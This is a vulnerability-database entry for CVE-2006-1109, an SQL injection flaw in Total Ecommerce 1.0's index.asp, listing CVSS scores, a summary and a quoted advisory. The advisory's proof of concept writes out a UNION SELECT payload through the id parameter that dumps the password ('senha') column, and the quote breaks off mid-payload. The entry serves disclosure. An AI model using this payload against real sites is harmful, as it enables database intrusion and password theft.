7.5
CVSSv2

CVE-2006-1109

Published: 09/03/2006 Updated: 18/10/2018
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in index.asp in Total Ecommerce 1.0 allows remote malicious users to execute arbitrary SQL commands via the id parameter. NOTE: it is not clear whether this report is associated with a specific product. If not, then it should not be included in CVE.

Vulnerable Product Search on Vulmon Subscribe to Product

totalecommerce totalecommerce 1.0

Exploits

Original advisory: wwwnukedxcom/?viewdoc=18 Advisory by: nukedx Full PoC Explotation: GET -> [victim]/[dir]/indexasp?secao=[PageID]&id=[SQL] EXAMPLE 1 -> [victim]/[dir]/indexasp?secao=25&id=-1+UNION+select+senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,sen ...